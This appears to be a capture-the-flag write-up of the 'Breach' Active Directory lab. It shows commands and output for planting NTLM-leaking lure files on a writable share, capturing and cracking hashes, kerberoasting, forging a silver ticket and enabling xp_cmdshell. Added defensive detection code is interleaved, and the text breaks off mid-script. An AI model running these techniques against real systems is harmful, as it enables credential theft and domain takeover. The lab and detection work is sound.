Nmap
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Breach]
└─$ nmap -sC -sV -Pn 10.129.249.166 -oN ./nmap.txt
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-09 00:43 UTC
Nmap scan report for 10.129.249.166
Host is up (0.34s latency).
Not shown: 986 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-11-08 13:45:05Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: breach.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: breach.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-11-08T13:46:33+00:00; -10h58m37s from scanner time.
| ssl-cert: Subject: commonName=BREACHDC.breach.vl
| Not valid before: 2025-09-07T08:04:48
|_Not valid after: 2026-03-09T08:04:48
| rdp-ntlm-info:
| Target_Name: BREACH
| NetBIOS_Domain_Name: BREACH
| NetBIOS_Computer_Name: BREACHDC
| DNS_Domain_Name: breach.vl
| DNS_Computer_Name: BREACHDC.breach.vl
| DNS_Tree_Name: breach.vl
| Product_Version: 10.0.20348
|_ System_Time: 2025-11-08T13:45:50+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: BREACHDC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-11-08T13:45:50
|_ start_date: N/A
|_clock-skew: mean: -10h58m39s, deviation: 2s, median: -10h58m41s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 132.83 seconds
The DNS name is BREACHDC.breach.vl; let's add it to our /etc/hosts.
SMB - TCP 445
First, I want to check the SMB service.
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Breach]
└─$ netexec smb breach.vl -u guest -p '' --shares
SMB 10.129.249.166 445 BREACHDC [*] Windows Server 2022 Build 20348 x64 (name:BREACHDC) (domain:breach.vl) (signing:True) (SMBv1:False)
SMB 10.129.249.166 445 BREACHDC [+] breach.vl\guest:
SMB 10.129.249.166 445 BREACHDC [*] Enumerated shares
SMB 10.129.249.166 445 BREACHDC Share Permissions Remark
SMB 10.129.249.166 445 BREACHDC ----- ----------- ------
SMB 10.129.249.166 445 BREACHDC ADMIN$ Remote Admin
SMB 10.129.249.166 445 BREACHDC C$ Default share
SMB 10.129.249.166 445 BREACHDC IPC$ READ Remote IPC
SMB 10.129.249.166 445 BREACHDC NETLOGON Logon server share
SMB 10.129.249.166 445 BREACHDC share READ,WRITE
SMB 10.129.249.166 445 BREACHDC SYSVOL Logon server share
SMB 10.129.249.166 445 BREACHDC Users READ
The share named share looks like our target, so I will enumerate it.
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Breach]
└─$ smbclient //10.129.249.166/share
Password for [WORKGROUP\wither]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Nov 8 13:51:31 2025
.. DHS 0 Tue Sep 9 10:35:32 2025
finance D 0 Thu Feb 17 11:19:34 2022
software D 0 Thu Feb 17 11:19:12 2022
transfer D 0 Mon Sep 8 10:13:44 2025
7863807 blocks of size 4096. 1494377 blocks available
smb: \> cd finance
smb: \finance\> ls
. D 0 Thu Feb 17 11:19:34 2022
.. D 0 Sat Nov 8 13:51:31 2025
cd
7863807 blocks of size 4096. 1491702 blocks available
smb: \finance\> cd ..
smb: \> cd transfer
smb: \transfer\> ls
. D 0 Mon Sep 8 10:13:44 2025
.. D 0 Sat Nov 8 13:51:31 2025
claire.pope D 0 Thu Feb 17 11:21:35 2022
diana.pope D 0 Thu Feb 17 11:21:19 2022
julia.wong D 0 Thu Apr 17 00:38:12 2025
I found three user folders; these should be valid account names.
We also have write access to this share, so I suspect the intended path is a phishing-style attack: upload a malicious file so that a user browsing the folder leaks their NTLMv2 hash.
We can use NTLM-Theft (ntlm_theft.py) to generate such files in various formats.
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Breach]
└─$ python3 /opt/utilities/ntlm_theft/ntlm_theft.py -g all -s 10.10.17.50 -f docs
/opt/utilities/ntlm_theft/ntlm_theft.py:168: SyntaxWarning: invalid escape sequence '\l'
location.href = 'ms-word:ofe|u|\\''' + server + '''\leak\leak.docx';
Created: docs/docs.scf (BROWSE TO FOLDER)
Created: docs/docs-(url).url (BROWSE TO FOLDER)
Created: docs/docs-(icon).url (BROWSE TO FOLDER)
Created: docs/docs.lnk (BROWSE TO FOLDER)
Created: docs/docs.rtf (OPEN)
Created: docs/docs-(stylesheet).xml (OPEN)
Created: docs/docs-(fulldocx).xml (OPEN)
Created: docs/docs.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
Created: docs/docs-(handler).htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
Created: docs/docs-(includepicture).docx (OPEN)
Created: docs/docs-(remotetemplate).docx (OPEN)
Created: docs/docs-(frameset).docx (OPEN)
Created: docs/docs-(externalcell).xlsx (OPEN)
Created: docs/docs.wax (OPEN)
Created: docs/docs.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY)
Created: docs/docs.asx (OPEN)
Created: docs/docs.jnlp (OPEN)
Created: docs/docs.application (DOWNLOAD AND OPEN)
Created: docs/docs.pdf (OPEN AND ALLOW)
Created: docs/zoom-attack-instructions.txt (PASTE TO CHAT)
Created: docs/docs.library-ms (BROWSE TO FOLDER)
Created: docs/Autorun.inf (BROWSE TO FOLDER)
Created: docs/desktop.ini (BROWSE TO FOLDER)
Created: docs/docs.theme (THEME TO INSTALL
Generation Complete.
Then upload these files to the transfer folder on the share.
┌──(wither㉿localhost)-[~/…/htb-labs/Medium/Breach/docs]
└─$ smbclient //10.129.249.166/share -U "guest"%"" -c 'prompt OFF; cd transfer; lcd ~/Templates/htb-labs/Medium/Breach/docs; mput *'
chdir to ~/Templates/htb-labs/Medium/Breach/docs failed (No such file or directory)
putting file docs.jnlp as \transfer\docs.jnlp (0.2 kB/s) (average 0.2 kB/s)
putting file zoom-attack-instructions.txt as \transfer\zoom-attack-instructions.txt (0.1 kB/s) (average 0.1 kB/s)
putting file docs.application as \transfer\docs.application (1.3 kB/s) (average 0.6 kB/s)
putting file Autorun.inf as \transfer\Autorun.inf (0.1 kB/s) (average 0.4 kB/s)
putting file docs.pdf as \transfer\docs.pdf (0.7 kB/s) (average 0.5 kB/s)
putting file desktop.ini as \transfer\desktop.ini (0.0 kB/s) (average 0.4 kB/s)
putting file docs.rtf as \transfer\docs.rtf (0.1 kB/s) (average 0.4 kB/s)
putting file docs-(url).url as \transfer\docs-(url).url (0.0 kB/s) (average 0.3 kB/s)
putting file docs.m3u as \transfer\docs.m3u (0.0 kB/s) (average 0.3 kB/s)
putting file docs.theme as \transfer\docs.theme (1.2 kB/s) (average 0.4 kB/s)
putting file docs.library-ms as \transfer\docs.library-ms (0.9 kB/s) (average 0.5 kB/s)
putting file docs-(handler).htm as \transfer\docs-(handler).htm (0.1 kB/s) (average 0.4 kB/s)
putting file docs-(fulldocx).xml as \transfer\docs-(fulldocx).xml (19.7 kB/s) (average 4.4 kB/s)
putting file docs.scf as \transfer\docs.scf (0.0 kB/s) (average 3.9 kB/s)
putting file docs.lnk as \transfer\docs.lnk (1.0 kB/s) (average 3.6 kB/s)
putting file docs-(includepicture).docx as \transfer\docs-(includepicture).docx (4.7 kB/s) (average 3.7 kB/s)
putting file docs-(externalcell).xlsx as \transfer\docs-(externalcell).xlsx (2.4 kB/s) (average 3.6 kB/s)
putting file docs.htm as \transfer\docs.htm (0.0 kB/s) (average 3.3 kB/s)
putting file docs-(stylesheet).xml as \transfer\docs-(stylesheet).xml (0.1 kB/s) (average 3.0 kB/s)
putting file docs.wax as \transfer\docs.wax (0.0 kB/s) (average 2.8 kB/s)
putting file docs-(remotetemplate).docx as \transfer\docs-(remotetemplate).docx (9.0 kB/s) (average 3.3 kB/s)
putting file docs-(frameset).docx as \transfer\docs-(frameset).docx (3.7 kB/s) (average 3.3 kB/s)
Then start Responder, and we capture the NTLMv2 hash of Julia.Wong.
[*] Version: Responder 3.1.7.0
[*] Author: Laurent Gaffie, <lgaffie@secorizon.com>
[*] To sponsor Responder: https://paypal.me/PythonResponder
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.129.249.166
[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong
[SMB] NTLMv2-SSP Hash : Julia.Wong::BREACH:27b3138b7497841a:3CE02BBC8FF329F0DA8EF8168B8F5671:010100000000000080915EC41451DC0178CBFA729C7D59F80000000002000800510058003800320001001E00570049004E002D0052005000510055005300430035004A00450035004A0004003400570049004E002D0052005000510055005300430035004A00450035004A002E0051005800380032002E004C004F00430041004C000300140051005800380032002E004C004F00430041004C000500140051005800380032002E004C004F00430041004C000700080080915EC41451DC0106000400020000000800300030000000000000000100000000200000F5B8E2780CA371BAEA940DBC900DE98B25C6376B91D3EFF7EF8124B71A4C61C10A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310037002E00350030000000000000000000
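From the defender's side, the weakness exploited above is a guest-writable share plus files that make Explorer authenticate to whatever host their icon or template points at. The following is an added example, not part of the original writeup or of ntlm_theft: a scanner that walks a copy of a share, unzips OOXML documents to see their relationship targets, and flags files that reference hosts outside an allowlist or that are of a type Explorer parses on a mere folder listing. The allowlist, the sample files and the 10.10.17.50 lure address are constructed for the demonstration.

```python
import re
import tempfile
import zipfile
from pathlib import Path

# Hosts that may legitimately appear in UNC paths on this network (constructed
# allowlist for the demonstration; a real one comes from the asset inventory).
TRUSTED_HOSTS = {"breachdc", "breachdc.breach.vl"}

# File types Explorer parses as soon as a folder is listed, with no click needed;
# finding one in a user-writable share is a finding on its own.
BROWSE_TRIGGER_TYPES = {".scf", ".url", ".lnk", ".library-ms"}
BROWSE_TRIGGER_NAMES = {"desktop.ini", "autorun.inf"}

# \\host\share style UNC paths and file://host/ URLs, as used in icon and template references.
UNC_RE = re.compile(r"\\\\([A-Za-z0-9][A-Za-z0-9._-]*)\\")
FILE_URL_RE = re.compile(r"file:/{2,}([A-Za-z0-9][A-Za-z0-9._-]*)/", re.IGNORECASE)


def scannable_text(path: Path) -> str:
    """Text to inspect: OOXML containers (docx/xlsx) are unzipped so that
    relationship targets are visible; other files are also decoded as UTF-16
    because .lnk stores its paths that way."""
    if zipfile.is_zipfile(path):
        with zipfile.ZipFile(path) as zf:
            return "\n".join(zf.read(n).decode("utf-8", "replace") for n in zf.namelist())
    raw = path.read_bytes()
    return raw.decode("utf-8", "replace") + "\n" + raw.decode("utf-16-le", "replace")


def referenced_hosts(text: str) -> set[str]:
    """Every host named in a UNC path or file:// URL, lower-cased."""
    return {h.lower() for h in UNC_RE.findall(text) + FILE_URL_RE.findall(text)}


def scan_share(root: Path, trusted: set[str] = TRUSTED_HOSTS) -> list[dict]:
    """Walk a copy of the share and report files that would make a client
    authenticate to a host outside the allowlist, or that should not be there."""
    findings = []
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        reasons = []
        if path.suffix.lower() in BROWSE_TRIGGER_TYPES or path.name.lower() in BROWSE_TRIGGER_NAMES:
            reasons.append("Explorer-parsed lure type")
        untrusted = sorted(h for h in referenced_hosts(scannable_text(path)) if h not in trusted)
        if untrusted:
            reasons.append("references untrusted host(s): " + ", ".join(untrusted))
        if reasons:
            findings.append({"file": path.relative_to(root).as_posix(), "reasons": reasons})
    return findings


def build_sample_share() -> Path:
    """Constructed sample share: one .scf lure, one docx with a remote template
    relationship, and one benign note that points at the real file server."""
    root = Path(tempfile.mkdtemp(prefix="share_"))
    transfer = root / "transfer"
    transfer.mkdir()
    (transfer / "docs.scf").write_text(
        "[Shell]\nCommand=2\nIconFile=\\\\10.10.17.50\\share\\docs.ico\n[Taskbar]\nCommand=ToggleDesktop\n")
    with zipfile.ZipFile(transfer / "report.docx", "w") as zf:
        zf.writestr("word/_rels/settings.xml.rels",
                    '<Relationship Id="rId1" Type="attachedTemplate" '
                    'Target="file://10.10.17.50/share/template.dotx" TargetMode="External"/>')
    (transfer / "notes.txt").write_text("Q3 figures live on \\\\breachdc\\share\\finance\n")
    return root


if __name__ == "__main__":
    for finding in scan_share(build_sample_share()):
        print(finding["file"], "->", "; ".join(finding["reasons"]))
```

Run it against a mirrored copy of the share (or as a scheduled job on the file server) and the .scf and the docx are reported while the note pointing at the real server is not. The scan complements, rather than replaces, the configuration fixes: guest should not have write access, and outbound SMB (445) from the client network to the internet or to untrusted segments should be blocked so a leaked authentication never reaches a listener.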
Now we can use hashcat to crack this NetNTLMv2 hash.
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Breach]
└─$ hashcat julia.hash -m 5600 /usr/share/wordlists/rockyou.txt
JULIA.WONG::BREACH:27b3138b7497841a:3ce02bbc8ff329f0da8ef8168b8f5671:[...]:Computer1
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: JULIA.WONG::BREACH:27b3138b7497841a:3ce02bbc8ff329f...000000
Time.Started.....: Sun Nov 9 01:06:31 2025 (0 secs)
Time.Estimated...: Sun Nov 9 01:06:31 2025 (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........: 1296.8 kH/s (1.57ms) @ Accel:1024 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 120832/14344385 (0.84%)
Rejected.........: 0/120832 (0.00%)
Restore.Point....: 118784/14344385 (0.83%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#01...: bratz1234 -> 042602
Hardware.Mon.#01.: Util: 63%
We get the credentials JULIA.WONG:Computer1
We can verify the credentials against SMB and WinRM
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Breach]
└─$ netexec smb breach.vl -u JULIA.WONG -p Computer1
SMB 10.129.249.166 445 BREACHDC [*] Windows Server 2022 Build 20348 x64 (name:BREACHDC) (domain:breach.vl) (signing:True) (SMBv1:False)
SMB 10.129.249.166 445 BREACHDC [+] breach.vl\JULIA.WONG:Computer1
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Breach]
└─$ netexec winrm breach.vl -u JULIA.WONG -p Computer1
WINRM 10.129.249.166 5985 BREACHDC [*] Windows Server 2022 Build 20348 (name:BREACHDC) (domain:breach.vl)
WINRM 10.129.249.166 5985 BREACHDC [-] breach.vl\JULIA.WONG:Computer1
Although we can't get a shell, we can read user.txt from the SMB share.
smb: \transfer\> cd julia.wong\
smb: \transfer\julia.wong\> ls
. D 0 Thu Apr 17 00:38:12 2025
.. D 0 Sat Nov 8 14:08:18 2025
user.txt A 32 Thu Apr 17 00:38:22 2025
7863807 blocks of size 4096. 1514326 blocks available
Bloodhound by julia.wong
Now let's use these credentials with bloodhound-python to collect domain information.
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Breach]
└─$ bloodhound-python -d breach.vl -u 'julia.wong' -p 'Computer1' -dc 'BREACHDC.breach.vl' -c all -ns 10.129.249.166 --dns-tcp
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: breach.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: BREACHDC.breach.vl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: BREACHDC.breach.vl
INFO: Found 15 users
INFO: Found 54 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: BREACHDC.breach.vl
INFO: Done in 01M 20S
Looking at Julia's account, I couldn't find anything else that worked.
Let's continue by looking at the kerberoastable users.
![[Pasted image 20251108142809.png]]
Silver tickets grant access to a specific service on a specific machine, while golden tickets grant access to any service or machine. With the svc_mssql service account's password (or rather the NT hash derived from it), I can forge a service ticket encrypted with that key, bypass the domain controller (DC) entirely, and present the ticket directly to the service.
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Breach]
└─$ GetUserSPNs.py 'breach.vl/julia.wong:Computer1' -request
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------------------- --------- -------- -------------------------- -------------------------- ----------
MSSQLSvc/breachdc.breach.vl:1433 svc_mssql 2022-02-17 10:43:08.106169 2025-11-08 13:44:43.544994
[-] CCache file is not found. Skipping...
$krb5tgs$23$*svc_mssql$BREACH.VL$breach.vl/svc_mssql*$8eb23b2a1180f82dd3f63da413ec2cb8$[...]
Then we can use hashcat to crack this TGS-REP hash.
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Breach]
└─$ hashcat mssqlsvc.hash -m 13100 /usr/share/wordlists/rockyou.txt
$krb5tgs$23$*svc_mssql$BREACH.VL$breach.vl/svc_mssql*$8eb23b2a1180f82dd3f63da413ec2cb8$[...]:Trustno1
We get another set of credentials: svc_mssql:Trustno1
Now we can forge the silver ticket with ticketer.py, supplying the NT hash of svc_mssql's password, the domain SID and the MSSQLSvc SPN, with administrator as the impersonated user.
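The $krb5tgs$23$ prefix in the roasted hash means the ticket was issued with RC4-HMAC (etype 23), which is what makes it cheap to crack. On the DC, the same request appears as event 4769 with TicketEncryptionType 0x17 for a service name that is an ordinary user account rather than a machine account. The following is an added example, not part of the original writeup: a small detection over constructed 4769 events that flags RC4 service tickets for user-account SPNs and, independently of encryption type, a single requester sweeping many user-account SPNs in a short window (the pattern of a GetUserSPNs -request run). The event field names are shortened from the event's XML, and svc_backup and svc_web are hypothetical service accounts added to the sample.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"  # etype 23: the $krb5tgs$23$ tickets that hashcat mode 13100 cracks

# Constructed 4769 (Kerberos service ticket requested) events as a SIEM would
# normalise them: TargetUserName -> account, ServiceName -> service,
# TicketEncryptionType -> etype, IpAddress -> client_ip, Status -> status.
SAMPLE_TGS_EVENTS = [
    {"time": "2025-11-08T13:44:10", "account": "julia.wong@BREACH.VL", "service": "BREACHDC$",
     "etype": "0x12", "client_ip": "10.129.249.50", "status": "0x0"},   # normal CIFS ticket, AES256
    {"time": "2025-11-08T13:44:43", "account": "julia.wong@BREACH.VL", "service": "svc_mssql",
     "etype": "0x17", "client_ip": "10.10.17.50", "status": "0x0"},     # RC4 ticket for a user SPN
    {"time": "2025-11-08T13:44:44", "account": "julia.wong@BREACH.VL", "service": "svc_backup",
     "etype": "0x17", "client_ip": "10.10.17.50", "status": "0x0"},     # hypothetical account
    {"time": "2025-11-08T13:44:45", "account": "julia.wong@BREACH.VL", "service": "svc_web",
     "etype": "0x17", "client_ip": "10.10.17.50", "status": "0x0"},     # hypothetical account
    {"time": "2025-11-08T13:45:00", "account": "diana.pope@BREACH.VL", "service": "svc_mssql",
     "etype": "0x12", "client_ip": "10.129.249.51", "status": "0x0"},   # legitimate SQL client, AES
    {"time": "2025-11-08T13:45:30", "account": "guest@BREACH.VL", "service": "svc_mssql",
     "etype": "0x17", "client_ip": "10.10.17.50", "status": "0x6"},     # failed request, ignored
]


def is_user_account_service(service: str) -> bool:
    """Machine accounts end in '$' and krbtgt is the TGT service; anything else is
    an SPN registered on an ordinary user account, i.e. a kerberoastable one."""
    name = service.split("/")[0].lower()
    return not name.endswith("$") and name != "krbtgt"


def analyze_tgs_events(events, window=timedelta(seconds=60), sweep_threshold=3):
    """Return alerts for (a) RC4 tickets issued for user-account SPNs and
    (b) one requester collecting tickets for >= sweep_threshold distinct
    user-account SPNs inside `window`."""
    alerts = []
    successful = [e for e in events if e["status"] == "0x0"]

    for e in successful:
        if is_user_account_service(e["service"]) and e["etype"] == RC4_HMAC:
            alerts.append({"rule": "rc4-ticket-for-user-spn", "account": e["account"],
                           "service": e["service"], "client_ip": e["client_ip"]})

    by_requester = defaultdict(list)
    for e in successful:
        if is_user_account_service(e["service"]):
            by_requester[(e["account"], e["client_ip"])].append(e)

    for (account, ip), reqs in by_requester.items():
        reqs.sort(key=lambda r: r["time"])
        # Sliding window: distinct services requested within `window` of each request.
        for i, start in enumerate(reqs):
            t0 = datetime.fromisoformat(start["time"])
            services = {r["service"] for r in reqs[i:]
                        if datetime.fromisoformat(r["time"]) - t0 <= window}
            if len(services) >= sweep_threshold:
                alerts.append({"rule": "spn-sweep", "account": account, "client_ip": ip,
                               "services": sorted(services)})
                break
    return alerts


if __name__ == "__main__":
    for alert in analyze_tgs_events(SAMPLE_TGS_EVENTS):
        print(alert)
```

The RC4 rule disappears as a signal once the service account is AES-only (msDS-SupportedEncryptionTypes), which is also the fix: a 128-bit AES key derived from a long random password, ideally a group Managed Service Account, is out of reach of a rockyou run, unlike Trustno1. The sweep rule still catches the request pattern afterwards, so keep both.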
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Breach]
└─$ ticketer.py -nthash 69596C7AA1E8DAEE17F8E78870E25A5C -domain-sid S-1-5-21-2330692793-3312915120-706255856 -domain breach.vl -spn "MSSQLSvc/breachdc.breach.vl:1433" "administrator"
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
/home/wither/.local/bin/ticketer.py:843: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
encRepPart['last-req'][0]['lr-value'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
[*] EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncTGSRepPart
[*] Saving ticket in administrator.ccache
Now we can access the MSSQL service as Administrator.
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Breach]
└─$ export KRB5CCNAME=administrator.ccache
┌──(wither㉿localhost)-[~/Templates/htb-labs/Medium/Breach]
└─$ mssqlclient.py -k -no-pass -windows-auth breachdc.breach.vl
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (BREACH\Administrator dbo@master)>
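Because the forged ticket goes straight to the service, the DC never issued it: there is a 4624 Kerberos network logon for Administrator on the host running SQL Server, but no 4769 on any DC for that account in the preceding ticket lifetime. The following is an added example, not part of the original writeup: a correlation over constructed DC 4769 events and host 4624 events that reports Kerberos network logons with no matching ticket issuance. The events, their timestamps and the client addresses are constructed; the 10-hour lifetime is the AD default for service tickets and is an assumption about this domain.

```python
from datetime import datetime, timedelta

TICKET_LIFETIME = timedelta(hours=10)  # AD default maximum service ticket lifetime (assumed here)

# Constructed DC-side 4769 events: which account asked for which service ticket, and when.
DC_TGS_EVENTS = [
    {"time": "2025-11-08T13:44:10", "account": "julia.wong", "service": "BREACHDC$"},
    {"time": "2025-11-08T13:44:43", "account": "julia.wong", "service": "svc_mssql"},
    {"time": "2025-11-08T13:45:00", "account": "diana.pope", "service": "svc_mssql"},
]

# Constructed 4624 events from the host running the service (logon type 3 = network).
HOST_LOGON_EVENTS = [
    {"time": "2025-11-08T13:44:12", "account": "julia.wong", "auth_package": "Kerberos",
     "logon_type": 3, "source_ip": "10.129.249.50"},
    {"time": "2025-11-08T13:45:02", "account": "diana.pope", "auth_package": "Kerberos",
     "logon_type": 3, "source_ip": "10.129.249.51"},
    {"time": "2025-11-08T13:56:30", "account": "guest", "auth_package": "NTLM",
     "logon_type": 3, "source_ip": "10.10.17.50"},          # NTLM: out of scope for this rule
    {"time": "2025-11-08T14:20:00", "account": "Administrator", "auth_package": "Kerberos",
     "logon_type": 3, "source_ip": "10.10.17.50"},          # no DC ever issued this ticket
]


def _ts(value: str) -> datetime:
    return datetime.fromisoformat(value)


def find_unissued_kerberos_logons(logons, tgs_events, lifetime=TICKET_LIFETIME):
    """Kerberos network logons for which no DC logged a 4769 for the same account
    within one ticket lifetime before the logon. A forged (silver) ticket is
    presented straight to the service, so the DC has no matching 4769."""
    issued = {}
    for e in tgs_events:
        issued.setdefault(e["account"].lower(), []).append(_ts(e["time"]))

    suspicious = []
    for logon in logons:
        if logon["auth_package"] != "Kerberos" or logon["logon_type"] != 3:
            continue
        when = _ts(logon["time"])
        issued_times = issued.get(logon["account"].lower(), [])
        if not any(when - lifetime <= t <= when for t in issued_times):
            suspicious.append({"account": logon["account"], "time": logon["time"],
                               "source_ip": logon["source_ip"],
                               "reason": "no 4769 on any DC for this account within ticket lifetime"})
    return suspicious


if __name__ == "__main__":
    for hit in find_unissued_kerberos_logons(HOST_LOGON_EVENTS, DC_TGS_EVENTS):
        print(hit)
```

Two caveats a practitioner will run into: the 4769 stream must be collected from every DC in the domain, and the account-level correlation is coarse (a legitimate Administrator ticket issued nine hours earlier would suppress the alert), so it is a triage signal rather than proof. Rotating the svc_mssql password (twice, because of the old-key grace) invalidates every ticket forged with the leaked hash.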
To obtain a shell, we need to enable xp_cmdshell as administrator so that we can execute OS commands.
SQL (BREACH\Administrator dbo@master)> EXEC sp_configure 'show advanced options', 1;
INFO(BREACHDC\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (BREACH\Administrator dbo@master)> RECONFIGURE;
SQL (BREACH\Administrator dbo@master)> EXEC sp_configure 'xp_cmdshell', 1;
INFO(BREACHDC\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (BREACH\Administrator dbo@master)> RECONFIGURE;
SQL (BREACH\Administrator dbo@master)> EXEC xp_cmdshell 'whoami';
output
----------------
breach\svc_mssql
NULL
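The sp_configure calls above leave a trace that is easy to monitor: SQL Server writes a message (error 15457, "Configuration option 'xp_cmdshell' changed from 0 to 1") to its ERRORLOG on every change, and a further informational line when the extended procedure is first loaded. The following is an added example, not part of the original writeup: a parser over constructed ERRORLOG lines that raises on the dangerous options being turned on and on xp_cmdshell being executed, while ignoring routine configuration changes. The sample lines, timestamps and spids are constructed; the line layout and message texts are SQL Server's own.

```python
import re

# ERRORLOG line layout: timestamp, spid, message.
LOG_LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+)\s+(?P<spid>\S+)\s+(?P<msg>.*)$")
# Error 15457, written on every sp_configure change.
CONFIG_CHANGE_RE = re.compile(
    r"Configuration option '(?P<option>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)")
# Informational line written when an extended procedure's DLL is first loaded.
XP_LOAD_RE = re.compile(r"to execute extended stored procedure '(?P<proc>[^']+)'")

# Options whose enabling hands OS-level or out-of-process capability to a SQL login.
HIGH_RISK_OPTIONS = {"xp_cmdshell", "Ole Automation Procedures",
                     "Ad Hoc Distributed Queries", "clr enabled"}

# Constructed sample ERRORLOG excerpt covering the sequence used in the writeup.
SAMPLE_ERRORLOG = """\
2025-11-08 13:50:01.23 spid51      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2025-11-08 13:50:05.41 spid51      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2025-11-08 13:50:06.02 spid51      Using 'xpstar.dll' version '2019.150.2000' to execute extended stored procedure 'xp_cmdshell'. This is an informational message only; no user action is required.
2025-11-08 13:52:00.00 spid52      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.
"""


def audit_errorlog(text: str) -> list[dict]:
    """Return one alert per security-relevant ERRORLOG line, with a severity."""
    alerts = []
    for line in text.splitlines():
        m = LOG_LINE_RE.match(line)
        if not m:
            continue
        ts, spid, msg = m.group("ts", "spid", "msg")

        change = CONFIG_CHANGE_RE.search(msg)
        if change:
            option, enabled = change.group("option"), change.group("new") != "0"
            if option in HIGH_RISK_OPTIONS:
                severity = "high" if enabled else "info"
            elif option == "show advanced options":
                severity = "low"          # precursor: required before xp_cmdshell can be toggled
            else:
                continue                  # routine tuning such as memory limits
            alerts.append({"time": ts, "spid": spid, "severity": severity,
                           "event": f"{option} {'enabled' if enabled else 'disabled'}"})
            continue

        load = XP_LOAD_RE.search(msg)
        if load and load.group("proc") == "xp_cmdshell":
            alerts.append({"time": ts, "spid": spid, "severity": "high",
                           "event": "xp_cmdshell executed (extended procedure loaded)"})
    return alerts


if __name__ == "__main__":
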